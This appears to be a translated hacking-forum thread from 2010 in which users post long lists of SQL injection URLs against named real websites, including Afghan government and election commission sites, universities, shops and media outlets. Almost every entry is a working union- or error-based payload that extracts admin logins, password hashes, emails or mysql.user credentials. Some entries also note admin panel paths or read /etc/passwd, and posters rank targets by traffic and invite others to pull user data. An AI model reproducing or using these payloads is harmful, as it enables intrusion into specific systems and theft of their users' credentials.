http://www.touringcartimes.com/news.php?id=4326'%20and%201=0%20union%20select%201 ,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 ,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,6 8,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84, 85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,1 01,102,103,104,105,106,107,108,109,110,111,112,113 ,114,115,116,117,118,119,120,121,122,123,124,125,1 26,127,128,129,130,131,132,133,134,135,136,137,138 ,139,140,141,142,143,144,145,146,147,148,149,150,1 51,152,153,154,155,156--%201
Site : _http://shop.blutronics.com
TIC: 10
PR: 3
Code:
_http://shop.blutronics.com/ViewProdotti.asp?Id=-391+or+1=(select+top+1+cast(UserName+as+nvarchar)% 2B':'%2B+cast(Password+as+nvarchar)+from+AccUsers+ where+id_user=1)
_http://www.moph.gov.af/en/events.php?id=21+and+1=0+UnIoN/**/SeLeCt+1,2,3,group_concat(id,0x3a,uname,0x3a,passw ord,0x3a,email),5,6,7,8,9,10,11,12+from+registered _members
Ministry of Public Health Afghanistan
---------
http://www.iec.org.af/eng/content.php?id=4+or+(1,1)=(select+count(0),concat( (select+concat(username,char(58),hash_password)+fr om+users+limit+0,1),floor(rand(0)*2))from(informat ion_schema.tables)+group+by+2)--+
Independent Election Commission of Afghanistan
---------
http://www.nbaa.com.af/file.php?id=6+and+1=0+union+select+1,2,3,4,aes_dec rypt(aes_encrypt(group_concat(username,char(58),pa ssword),1),1),6+from+websiteadmin_admin_users
National Basketball Association of Afghanistan
---------
http://www.misfa.org.af/file.php?id=122+and+1=0+union+select+1,2,3,4,aes_d ecrypt(aes_encrypt(user_pwd,1),1),6+from+users+whe re+user_name=char(119,97,100,111,111,100)
Microfinance Investment Support Facility for Afghanistan
PR 4
195.8.80.50
blunt
5.0.77-log
unknown-linux-gnu
http://www.bluntlondon.com/work.php?id=201+and+1=0+%20Union%20Select%20%20CON CAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28 %29,version%28%29%29,2
---------------------------------------
PR 3
stratisa_stratis@localhost
stratisa_stratisdb
4.1.22-standard
pc-linux-gnu
http://www.stratisautosport.gr/en/products/car.php?id=43+and+1=0+UNION%20SELECT%201,CONCAT_WS %28CHAR%2832,58,32%29,user%28%29,database%28%29,ve rsion%28%29,@@version_compile_os%20%29,3,4,5
http://collections.glasgowmuseums.com/cld.html?cid=533619%20and%201=2%20union%20select%2 01,2,3,4,5,6,7,8,9,10,11,12,13,14,version(),16,17, 18,19,20 --
5.0.51b-community-nt
http://www.ries.com/iframes/articles-read.php?id=55'+and+1=0+union+select+1,2,3,4,5,6,g roup_concat(table_name),8+from+information_schema. tables+where+table_schema=database()+--+
TIC : 30
http://www.4apes.com/science/read.php?id=613'+and+1=0+union+select+1,2,3,concat _ws(0x3a,id,loginname,password,email),5,6,7,8,9+fr om+phplist_admin+limit+0,1+--+
Code:
http://www.4apes.com/lists/admin/ - The project's admin panel
TIC : 10
http://www.greyhenpress.com/news.php?id=-4'%20union%20select%201,2,group_concat(table_name, 0x3a,table_rows),4,5,6%20from%20information_schema .tables--%201
http://www.montreuxjazz.com/news.php?id=-37%20union%20select%201,2,3,unhex(hex(table_name)) ,5,6,7,8,9,10,11,12,13,14%20from%20information_sch ema.tables%20limit%2017,1--%201
http://www.mba.ru/studentsworks.php?id=-6+union+select+1,2,concat_ws(0x3a,manager_name,adv _password),4,5,6+from+mbs.mbs_managers--
TIC 300 PR5
http://www.shareapic.net/content.php?gid=187428.8%27union%20select%201,2,gr oup_concat%280x3c62723e,login,0x3a3a,password,0x3a 3a,email,0x3a3a,usertype%29,4,5,6,7,8%20from%20sha reapic.users%20where%20login%20like%200x2561646d69 6e25--%20
maybe someone will find it interesting)
100k+ traffic)
http://www.thedailystar.net/latest/updates.php?pid=-1%0Aunion%0Aall%0Aselect%0A1,2,3,4,5/*
also high-traffic)... pull the users yourselves if anyone is interested
BUSINESS HERALD
http://www.volgogradcci.ru/udv/index.php?loc=1&id=-135+and+1=2+union+select+concat_ws(0x3a,@@version, user(),database(),@@version_compile_os),2+--
5.0.19-log root@localhost udv pc-linux-gnu
http://www.wandatech.com/Products.php?pid=84+or+(select+count(*)from(select +1+union+select+2+union+select+3)x+group+by+concat (mid((select+concat_ws(0x3a,id,lastname,password)+ from+cc_members+limit+0,1),1,64),floor(rand(0)*2)) )
Some shop with umbrellas
phpinfo() output - http://www.wandatech.com/v.php
http://www.szczecinek.lasy.gov.pl/goscino/aktualnosci.php?numer=1347&id=41+UnIon+selECt+1,2,3,4,concat(Login,char(58),H aslo),6,7,8,9,10+from+UZYTKOWNICY+--+
Admin panel - administracja/login.php
Dating?!
http://www.adultfyi.com/read.php?ID=999999+union+select+1,concat_ws(0x3a,v ersion(),user()%20,database(),@@version_compile_os ),3,4,5,6,7,8--
http://www.siberianbrides.com/show_anketa_lady.php?id=99999+union+select+concat_ ws(0x3a,version(),user()%20,database(),@@version_c ompile_os),2,3,4,5,6,7--
http://www.capitansilver.ru/?id=-4+union+select+1,2,concat_ws(0x3a,version(),user() ,database(),@@version_compile_os),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19+--
4.0.27-log silver2@zvm13.host.ru silver2 pc-linux-gnu
http://www.capitansilver.ru/?id=-4+union+select+1,2,concat_ws(0x3a,login,password), 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+use r+limit+0,1--
http://www.greennavigation.com/news/news_profile.php?id=-33+union+select+0,1,2,3,concat(username,0x3a,p ass word),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from +login
PR 4
http://www.jitreshippables.com/news1.php?id=-5+union+select+1,concat(username,0x3a,p ass word,0x3a,email),3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+j os_users
PR 3
http://www.hopeevanmin.org/calendar/eventdisplay.php?id=-13%20union%20select%201,2,concat(username,0x3a,p ass word)%20from%20admin
PR 2
http://www.adoradoll.us/news_detail.php?ID=44+union+select+0,concat(UserNa me,0x3a,P ass Word),2,3,4,5,6,7,8,9,10,11+from+DownUser
PR 3
http://mycjonline.com/articlesdetails.php?id=-21%20%20union%20select%20concat(username,0x3a,p ass word),2,3%20from%20users
PR 3
http://www.lapine-fsbo.com/index.php?go=detail&id=-99999/**/union/**/select/**/0,0,0,0,0,0,0,0,0,0,0x7c,email,0x3a,concat(usernam e,0x3a,p ass word),1,1,1,1,1,1,2,2,2,2,2/**/from/*%20*/admin--
PR 2
http://nekar.gr/index.php?id=-1%20union%20select%200,concat(username,0x3a,p ass word,0x3a,email),2,0x65786569207369676f75726120736 f6261726f2070726f626c686d6120682053514c20746f75207 369746521,4,5,6,7,8,9,10,11%20from%20admins--
PR 4
http://www.discoveryland.cn/index.php?c=article&a=view&artid=104%20and%201=2%20union%20all%20select%201,2 ,3,concat(username,0x3a,password),5,6,7,8,9,10%20f rom%20dland_admin%20limit%200,1--
PR 5
http://www.citme.com.cn/news.php?id=-57+union+select+0,concat_ws(username,0x3a,password ),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26+from+Tb_Admin
PR 5 Cy 10
http://toeic-vietnam.com/info/details.php?id=null%20union%20select%201,2,group_c oncat(username,0x3a,password),4,5,6,7%20from%20use rs
PR 4
http://www.futurape.com/vedi-news.php?id=7+AND+1=2+UNION+SELECT+1,2,group_conca t(Username,0x3a,Password),4,5,6,7,8,9+FROM+Utente
PR 3
http://www.shangproperties.com/news_archive.php?id=-6%20union%20select%201,%202,%203,%204,%205,6,%207, group_concat(Username,0x3a,Password),%209,%2010,%2 011,%2012,%2013,%2014+from+auth_user_md5--
PR 3
http://www.hiast.edu.vn/index.php?pg=tintuc&task=chitiet&p2=52&p3=-129+Union+Select+1,2,3,group_concat(username,0x3a, password,0x3a),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8+from+bee_admin--&lang=en
PR 3
http://www.radarmadiun.co.id/main.php?act=detail&catid=24&id=-335+UNION+ALL+SELECT+1,2,3,4,5,group_concat(userna me,0x3a,password,0x3a,name,0x3a,email,0x3a,phone,0 x3a,status,0x3a,createdby,0x3a,created,0x3a,update d,0x3a,lastlogin),7,8,9+from+cms_users+--
PR 3
http://www.smkn2bukittinggi.com/detail.php?id=-3%20union%20select%201,group_concat(username,0x3a, password),3,4,5,6,7,8,9,10,11,12%20from%20user
PR 4
http://nkutr.nku.edu.tr/haberdetay.php?id=-1111'UNioN%20SeLeCt%201,GRouP_ConCaT(username,0x3a ,password,0x3a,email),3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1%20from%20mmyo_users--+
PR 7 Cy 10
http://www.coursupreme.dz/index.php?p=affichedecision&id=-669%20union%20select%201,2,3,4,5,6,load_file('/etc/passwd'),8+from+mysql.user
A clear example of reading files through an SQL injection
PR 5
http://eyeworld.mobi/current-issue-article.php?id=5621%20and%20substring(version(),1, 1)=3
3rd branch =\
http://www.cadtutor.mobi/links/includes/jump.php?id=2%20and%20ascii(lower(substring((selec t version()),1,1)))>1
http://www.ulbsibiu.ro/ro/stiri/news.php?print=true&news_id=-999.9%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, (SELECT%20concat(0x7e,0x27,Hex(cast(jos_users.pass word%20as%20char)),0x27,0x7e)%20FROM%20cat_sociolo gie.jos_users%20LIMIT%200,1)%20,28,29,30,31,32,33, 34,35,36,37,38--
PR 8 Cy 30
[Feldmarschall]
17.10.2010, 22:40
Diplomatic Academy of Vienna (Vienna)
Code:
http://www.da-vienna.at/jart/prj3/diplomatische_akademie/main.jart?rel=en&reserve-mode=active&content-id=1268305958599&artikel_id=-4283+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a ,0x3a,0x3a,username,0x3a,0x3a,password,0x3a,0x3a,a nrede,0x3a,0x3a,realvname,0x3a,0x3a,realnname,0x3a ,0x3a,land,0x3a,0x3a,ort,0x3a,0x3a,plz,0x3a,0x3a,s trasse,0x3a,0x3a,email,0x3a,0x3a,gebdat,0x3a,0x3a, 0x3a),11,12,13,14,15,16,17+from+diplak.wuser_user--
PR — 7
-PRIVAT-
17.10.2010, 22:46
http://www.conbhaireangsd.co.uk/dogpage.php?dog_ID=-17/**/UNION/**/SELECT/**/1,2,3,4,5,concat_ws(0x3a,user_ID,username,password ),7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1%20FROM%2 0user--
http://www.dialynne.co.uk/dogpage.php?dog_ID=-17/**/UNION/**/SELECT/**/1,2,3,4,5,concat_ws(0x3a,user_ID,username,password ),7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1%20FROM%2 0user--
http://www.flamuna.co.uk/dogpage.php?dog_ID=-17/**/UNION/**/SELECT/**/1,2,3,4,5,concat_ws(0x3a,user_ID,username,password ),7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1%20FROM%2 0user--
http://www.stormavon.co.uk/dogpage.php?dog_ID=-17/**/UNION/**/SELECT/**/1,2,3,4,5,concat_ws(0x3a,user_ID,username,password ),7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1%20FROM%2 0user--
http://www.diptonia.co.uk/dogpage.php?dog_ID=-17/**/UNION/**/SELECT/**/1,2,3,4,5,concat_ws(0x3a,user_ID,username,password ),7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1%20FROM%2 0user--
http://www.asc-hq.org/asc/comm_details.php?gamer_id=-1287%20union%20select%201,2,3,4,5,6,7,group_concat %28column_name%29,9,0,1,2,3,4,5,6%20from%20informa tion_schema.columns%20where%20table_name=0x74696b6 95f7573657273--
http://www.baryakina.com/?razdel=lang&ln=-2%20union%20select%201,2,3--
http://www.anunt.md/rus/telecom/anunturi/mobile_view.php?id=1507%20union%20select%201,2,3,4 ,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,version(),4,5 ,6,7,8,9,0,1,2,3--
http://baltictravelnews.com/modules/printer_view/print_view.php?pub_id=-58160%20union%20select%201,concat%28@i:=0x00,@o:=0 x0d0a,benchmark%28225,@o:=CONCAT%28@o,0x0d0a,%28SE LECT%20concat%28table_schema,0x2E,@i:=table_name%2 9%20FROM%20information_schema.tables%20WHERE%20tab le_name%3E@i%20order%20by%20table_name%20LIMIT%201 %29%29%29,@o%29,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9, 0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4, 5,6,7,8,9,0,1,2,3,4,5,6,7&l=ee
http://www.nomachine.com/news-read.php?idnews=284-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16--
http://u-books.ru/index.php?book_id=8353-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18--
http://europeanleague.ru/news.php?id=79-999.99%20union%20select%201,2,3,4,5,6,7,8,9,10--
http://jobs.genomecenter.ucdavis.edu/start_app.php?job_id=78 union select 1,2--
http://www.pro-estate.ru/showalla.html?agent_id=-58057%20or%201%20group%20by%20concat(version(),flo or(rand(0)*2))having%20min(0)%20or%201--%201
Output appears in the Title
http://www.caiv.org/noticias.php?apartado=israel&mire_id=278%20or%201%20group%20by%20concat((select/**/regi_Password%20from%20registros%20limit%200,1),fl oor(rand(0)*2))having%20min(0)%20or%201--%201&seccion=Noticias%20de%20Israel
http://www.use.or.ug/copindex.php?cat=lstofallco&subcat=lstcodir&cop=84+and+1=0+union+select+1,2,3,version(),5,6,7, 8,9,10,11,12,13,14,15,16,17--
http://www.umi.ac.ug/courses2.php?course_id=73+or+1+group+by+concat((se lect+version()+from+information_schema.tables+limi t+0,1),floor(rand(0)*2))having+min(0)+or+1--
[Dark Green]
18.10.2010, 05:43
This is my debut in this thread. I hope I'll be useful to at least someone.
filmworld.com.ua
admin:filmworldadmin
PR: 0 TIC: 0
Database Version: 5.0.91-community-log
Database name: filmworl_film
User name: filmworl@localhost
OC type: unknown-linux-gnu
Code:
http://filmworld.com.ua/index.php?shop=yes&razd=%C2%EE%E5%ED%ED%FB%E5%20(mpeg)&rubr=%D4%E8%EB%FC%EC%FB%20(mpeg)&id=1030+and+1=0+union+select+unhex(hex(version()))--
Code:
http://filmworld.com.ua/index.php?shop=yes&razd=%C2%EE%E5%ED%ED%FB%E5%20(mpeg)&rubr=%D4%E8%EB%FC%EC%FB%20(mpeg)&id=1030+and+1=0+union+select+login+from+customer+l imit+0,1--
Code:
http://filmworld.com.ua/index.php?shop=yes&razd=%C2%EE%E5%ED%ED%FB%E5%20(mpeg)&rubr=%D4%E8%EB%FC%EC%FB%20(mpeg)&id=1030+and+1=0+union+select+password+from+custome r+limit+0,1--
vmo.rgub.ru
PR: 6 TIC: 60
Database Version: 5.1.37-1ubuntu5.4
Database name: vmo_db01
User name: root@localhost
OC type: debian-linux-gnu
FILE_PRIV: Y
Magic quotes = off
Code:
http://vmo.rgub.ru/policy/article.php?id=214+and+1=0+union+select+1,unhex(he x(version())),3,4,5,6,7,8,9,10,11,12--
Code:
http://vmo.rgub.ru/policy/article.php?id=214+and+1=0+union+select+1,login,3, 4,5,6,password,8,9,10,11,12+from+users+limit+0,1--
mirpodarkov.in.ua
PR: 2 TIC: 0
Database Version: 5.0.91
Database name: wildcat_mir
User name: wildcat@localhost
OC type: redhat-linux-gnu
Code:
http://mirpodarkov.in.ua/index.php?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,unhex( hex(version())),11--
Code:
http://mirpodarkov.in.ua/index.php?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,user_g roup,11+from+dle_users+limit+0,1--
Code:
http://mirpodarkov.in.ua/index.php?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,passwo rd,11+from+dle_users+limit+0,1--
Code:
http://mirpodarkov.in.ua/index.php?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,userna me,11+from+dle_users+limit+0,1--
Code:
http://mirpodarkov.in.ua/index.php?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,email, 11+from+dle_users+limit+0,1--
Code:
http://mirpodarkov.in.ua/admin.php
http://www.oxothik.ru/index.php?action=news&id=-99+union+all+select+1,concat_ws(0x3a,@@version,use r(),database(),@@version_compile_os),3,4,5,6,7--
5.0.26-lk-log ecliptru_tour@localhost ecliptru_tour pc-linux-gnu
http://www.blue-keeeber.com/index.php?mod=gallery&list=-219%20union%20select%201,2,3,concat%28user,0x3a,pa ssword,0x3a,file_priv%29,5,6,7,8+from+mysql.user--
PR 3
http://www.unet.edu.ve/unet2001/noticias.php?id=1947+AND+1=2+UNION+SELECT+0,concat %28user,0x3a,password%29,2+FROM+mysql.user--
PR 6 Cy10
http://www.internetprovsechny.cz/clanek.php?cid=-92+UNION+SELECT+concat%28user,0x3a,password,0x3a,F ile_Priv%29+from+mysql.user--
PR 5 Cy 10
http://bollystic.com/Bollywood/showMovie.php?id=-564%20union%20select%201,2,group_concat%28user,0x3 a,password,0x3a,File_Priv%29,4,5,6,7,8,9,10%20from %20mysql.user--
PR 2
http://www.aries.ro/index.php?lang_id=-1+AND+1=2+UNION+SELECT+group_concat%28user,0x3a,pa ssword,0x3a,File_Priv%29+FROM+mysql.user--
PR 5 Cy 10
http://www.aps.ai/newsstory.php?id=43+and+1=0%20Union%20Select+1,gro up_concat%28user,0x3a,password,0x3C62723E%29,3,4,5 ,6+from+mysql.user
PR 5
http://www.asidoregon.org/newsdetail.php?id=209+AND+1=2+UNION+SELECT+0,group _concat%28user,0x3a,password%29,2,3,4,5,6,7%20from %20tblUsers--
PR 4 Cy 10
Code:
http://ecommerce.diocese-kcsj.org/respectlife/view-page.php?Page_ID=-14+union+select+1,2,concat_ws(0x3a,version(),user( ),database(),@@version_compile_os),4,5,6,7--
Database Version: 5.0.77
Database name: 4575_diocese_kcsjorg
User name: 4575_user1282171@lnh-www1h.bluehalo.myregisteredsite.com
OC type: redhat-linux-gnu
http://www.dawnnet.org/resources-news.php?id=-170%20/*!union*/%20select%201,2,3,table_name,5,6,7,8,9,0,11,12%20f rom%20information_schema./*!tables*/%20limit%2028,1--%201
http://www.81femmes.org/uk/news.php?id=-121%20union%20select%20version(),2,3,4--%201
http://www.alekseykalugin.ru/index.php?togive=think_read&id=17+and+1=0+union+Select+concat_ws(0x3a,username ,user_password),2,3+from+akphpbb_users+limit+1,1+--+
TIC: 230
http://oblmed.nsk.ru/inex1.php?action=read&id=861+and+1=0+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,concat_ws(0x3a,id,username,passwo rd),18,19,20,21,22,23,24,25+From+OblBol_users+limi t+0,1+--+&hr=cs_53
TIC: 230
http://safes.ru/show_good.php?idtov=10066'+and+1=0+UnIon+%0A+selEC t+1,2,3,concat_ws(0x3a,username,PASSWORD),5,6,7,8, 9,10,11,12,13,14,15,16,17,18+from+admin+limit+0,1+--+
TIC: 110
http://www.safeburg.ru/cgi-bin/news/view.cgi?news=92'+and+1=0+UnIon+selECt+1,concat_ws (0x3a,ID,USER,LOGIN,PSW),3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from +user_access+--+
TIC: 80 PR: 3
http://massage-kreslo.ru/show_good.php?idtov=1061'+and+1=0+UnIon+selECt+1,2 ,3,concat_ws(0x3a,username,password),5,6,7,8,9,10, 11,12,13,14,15,16,17+from+admin+--+
http://arpion.ru/show_good.php?idtov=22312'+and+1=0+UnIon+selECt+1, 2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from +admin+--+
TIC: 70
http://best-carmusic.ru/show_good.php?idtov=3696'+and+1=0+UnIon+selECt+1,2 ,3,concat_ws(0x3a,username,password),5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20+from+admin+--+
TIC: 10
http://77tv.ru/show_good.php?idtov=220201'+and+1=0+UnIon+%0A+selE Ct+1,2,3,concat_ws(0x3a,username,password),5,6,7,8 ,9,10,11,12,13,14,15,16,17+from+admin+--+
TIC: 10 PR: 2
http://vremeninet.ru/show_good.php?idtov=1073'+and+1=0+UnIon+%0A+selECt +1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9 ,10,11,12,13,14+from+admin+--+
TIC: 20
itsell.ru/show_good.php?idtov=1101051'+and+1=0+UnIon+selECt+ 1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19+from+admin+--+
TIC: 20
----------------------------------------------
And once again it all started with sloppy website developers ))
http://www.bornet.ru/kl.php , poke around if you like. There are more than 200 buggy sites there
http://www.visitnacogdoches.org/news.php?id=-198' union select 1,table_schema,table_name,table_rows,0x3c68723e,6, 0x3c68723e,8 from information_schema.tables where table_rows>0-- 1
http://www.ummaclinic.org/news.php?id=-21' /*!union*/ select /*!concat*/(table_name),2,3,4,5,6,7,8,9 /*!from*/ information_schema.`tables` limit 38,1-- 1
Dr..VATSON
19.10.2010, 03:19
Code:
http://www.lisenok.ru/look.php?id=-99999+union+select+1,2,3,concat_ws%280x3a,login,pa ssword,access_level%29,5+from+users--
TIC 60
http://www.lisenok.ru/login.php
http://www.sultanbrunei.com/news_read.asp?id=0x3a+union+select+0,concat%28user %28%29,0x3a,database%28%29,0x3a,version%28%29%29,2 ,3,4,5,6,7,8--
PR 3
http://www.inovasi.lipi.go.id/hki/news/news.php?id=37+AND+1=2+UNION+SELECT+1,2,concat%28u ser,0x3a,password%29,4,concat%28user,0x3a,password %29,concat%28user,0x3a,password%29+FROM+mysql.user--
PR 5
http://www.habibrafiq.com/services.php?id=-22+union+select+0,1,concat%28user,0x3a,pass%29,3,4 ,5+from+admin
PR 3
http://cooksnotebook.com/show.php?id=-999+union+select+1,2,3,concat%28user%28%29,0x3a,ve rsion%28%29,0x3a,database%28%29%29,5,6,7,8--
PR 3
http://www.ceelqaboobe.com/view.php?id=-3561%20union%20select%201,2,3,4,5,concat%28user%28 %29%29,7,8,9,10--
PR 4
http://www.saladillo.gov.ar/informe_prensa_detalle.php?id=322+union+select+0,1 ,2,3,4,5,6,7,concat_ws%28user,0x3a,pass%29,9,10,11 +from+admin
P.S. This site was already posted in PHP-inj, and now here's an SQL injection...
PR 4
http://www.rodonorte.pt/news.php?id=20+and+0=1+union+all+select+0x31,0x32, 0x33,unhex%28hex%28concat%28user%28%29,0x3a,versio n%28%29%29%29%29,0x35,0x36--
PR 6 Cy 10
http://clips.abusora.com/Clip.php?item_id=-25164%20union%20all%20select%201,2,concat%28user%2 8%29,0x3e,version%28%29,0x3e,database%28%29%29,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18--
PR 3
http://www.pc-boost.com/logitheque.php?idCat=11+and+0=1+union+all+select+c oncat%28user%28%29,database%28%29%29
P.S. The output is rendered in white, so either select the whole page or look in the source...
PR 4 CY 10
http://www.intema.gov.ar/curriculum.php?id=-109+union+select+1,2,3,4,5,concat%28user,0x3a,pass %29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25+from+login--
PR 4
http://www.sparkle.ir/products/category.php?id=9+union+select+1,2,concat%28user%2 8%29,version%28%29,database%28%29%29,4,5,6,7,8,9,1 0,11,12,13,14,15
PR 3
http://www.denhelder.nl/index.php?menu_id=60&nieuws_id=-3792+union+all+select+1,2,concat_ws%28user%28%29,0 x3a,database%28%29,0x3a%29,4,5,6,7,8,9,10,11--
PR 5 Cy 10
http://www.toxis.dk/8.0/news.php?id=40' union select 1,2,group_concat(table_name,0x3a,table_rows),4,5,6 ,7,8 from information_schema.tables-- 1
http://www.mesquitelocalnews.com/news.php?id=12)) or 1 group by concat((select table_name from information_schema.tables limit 17,1),floor(rand(0)*2))having min(0) or 1-- 1
http://www.melonfire.com/community/columns/trog/article.php?id=-280 /*!union*/ select 1,2,table_name,4,5,6 from information_schema.`tables`-- 1
http://www.shalomhills.com/eventdisplay.php?id=-999+union+select+version(),2,3--
http://www.milsetasia.org/milset/showstatic.php?id=4+and+1=0+union+select+version() ,2,3,4,5,6,7&lang=ar
http://www.artsadmin.co.uk/opportunities/bursary.php?id=1 or 1 group by concat((select version()),floor(rand(0)*2))having min(0) or 1-- 1
http://www.usauctionsonline.com/propertydetail.php?id=719 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,table_name, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,5 1,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67, 68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84 ,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100, 101,102,103,104,105,106,107,108,109,110,111,112 from information_schema.tables limit 28,1--
http://www.akella.com/gameclub/rating.php?id=-227+union+select+1,2,3,4,concat%28login,0x3a,pass% 29,6+from+users+--+
PR 5 Cy 1700
Seems like a serious company, and yet such a hole...
http://www.fortemall.com/auction_details.php?auction_id=964+and+row(0,0)in( select+count(@@wait_timeout),concat((select/**/concat(0x5b,user,0x5d,0x2d,0x5b,password,0x5d)/*{file_priv:Y}*/from+mysql.user+limit+1),char(58),floor(rand(0)*2) )as+z+from+information_schema.tables+group+by+z)
5.0.91-community
http://www.radiotec.ru/novosti.php?NWS=-2+UNION+SELECT+1,group_concat%28table_name%29,3,4+ from+information_schema.tables+where+table_schema! =0x696e666f726d6174696f6e5f736368656d61
http://www.global.duke.edu/admin/map/details.php?id=64' union select @@version-- 1
http://forumartgallery.com/admin/view_artistdet.php?id=193' and 1=0 union select 1,concat(admin_name,0x3a,admin_pwd),3,4,5,6 from admin-- 1
JetMotoService.Ru
http://jetmotoservice.ru/index.php?id_link=-182+and+1=2+union+select+1,2,3,concat(@@version,0x 20,user(),0x20,database(),0x20,@@version_compile_o s),5,6,7,8,9+--
5.0.32-Debian_7etch6-log u168307_2@localhost u168307_3 pc-linux-gnu
http://jetmotoservice.ru/index.php?id_link=-182+and+1=2+union+select+1,2,3,concat(user_login,0 x20,user_pass),5,6,7,8,9+from+msk_users+--
-PRIVAT-
21.10.2010, 15:51
http://www.geog.utah.edu/faculty/index.html?id=-1%20union%20select%201,2,3,4,concat_ws(0x3a,id,use rname,password),6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2, 3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8%20from%20users--
http://evergladesfoundation.biz/article.php?id=14%20or%201%20group%20by%20concat%2 8version%28%29,floor%28rand%280%29*2%29%29having%2 0min%280%29%20or%201--%201
http://www.dhana.biz/articles/article.php?id=25375%20or%201%20group%20by%20conca t%28version%28%29,floor%28rand%280%29*2%29%29havin g%20min%280%29%20or%201--%201&act=print
http://www.witec.biz/en/company/witecnews/news.php?id=50%20or%201%20group%20by%20concat%28ve rsion%28%29,floor%28rand%280%29*2%29%29having%20mi n%280%29%20or%201--%201
http://ukrinfo.biz/downloads/download.php?id=-7%20union%20select%201,2,3,4,5,6,7,8,9,0,1--
http://www.youngfuture.biz/podcast/news/index.php?news_id=-60%20union%20select%201,2,concat%28@i:=0x00,@o:=0x 0d0a,benchmark%28181,@o:=CONCAT%28@o,0x0d0a,%28SEL ECT%20concat%28table_schema,0x2E,@i:=table_name%29 %20FROM%20information_schema.tables%20WHERE%20tabl e_name%3E@i%20order%20by%20table_name%20LIMIT%201% 29%29%29,@o%29,4,5,6,7,8,9--
http://www.cadtutor.biz/corner/article.php?id=315 union select 1,version(),2,3,4,5,6--
http://airways.exbabylon.net/channels.html?article_id=186 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3--&channel_id=36
http://www.saltmag.net/display.php?article_id=240 union select 1,2,version(),4,5,6,7,8,9--
http://www.healthychild.net/SafetyFirst.php?article_id=179%20or%201%20group%20 by%20concat%28version%28%29,floor%28rand%280%29*2% 29%29having%20min%280%29%20or%201--%201
http://allrite.net/web/article.php?article_id=-90%20union%20select%20concat_ws%280x3a,mail,pass%2 9,2,3,4,5,6,7%20from%20users--
http://www.jazzhouse.org/gone/lastpost2.php3?edit=-1139276241+union+select+1,2,concat%28username,0x3a ,password,0x3a,id%29,4,5,6,7+from+ftp.ftp--
PR 6 Cy 30
COMMUNIST PARTY OF THE RUSSIAN FEDERATION
http://www.kprforel.ru/?news_id=1552&menuid=2+union+select+1,concat_ws(char(58),@@versi on,user(),database(),@@version_compile_os),3,4,5,6 +--+
4.0.26-log Uwww4945S@localhost udb4945 portbld-freebsd4.10
http://www.kprf-kaliningrad.ru/?id_n=-323+and+1=2+union+select+1,2,concat(0x3a,@@version ,user(),database(),@@version_compile_os),4,5+--&id=news
5.0.90-log u52083@10.8.0.97 u52083 portbld-freebsd7.2
